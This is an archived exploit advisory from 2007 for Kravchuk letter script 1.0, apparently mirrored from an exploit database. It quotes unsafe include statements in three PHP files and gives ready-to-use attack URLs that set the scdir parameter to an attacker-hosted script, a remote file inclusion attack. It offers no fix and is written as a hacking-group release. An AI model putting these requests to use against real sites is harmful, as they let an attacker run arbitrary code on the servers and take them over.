Kravchuk letter script 1.0 (scdir) Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kravchuk letter script 1.0 (scdir) Remote File Inclusion Vulnerabilities
# Published : 2007-06-05
# Author : xoron
# Previous Title : Kartli Alisveris Sistemi 1.0 Remote SQL Injection Vulnerability
# Next Title : Comicsense 0.2 (index.php epi) Remote SQL Injection Vulnerability

++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++
+   K-letter 1.0 << Remote File include                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   DownloadScript: http://www.scripts.com.ua/download.php?ID=813   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   Cyber-warrior.org <<< sanal alemin DEV.                         +
+                                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [1];  action.php?                                         +
+              include ($scdir."admin/config.inc.php");             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/acrion.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [2];  subs.php?                                           +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/subs.php?scdir=[3vil script]                +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [3];  unsubs.php?                                         +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/unsubs.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+DORK:(                                                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++CYBER-SECURITY+++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# www.Syue.com [2007-06-05]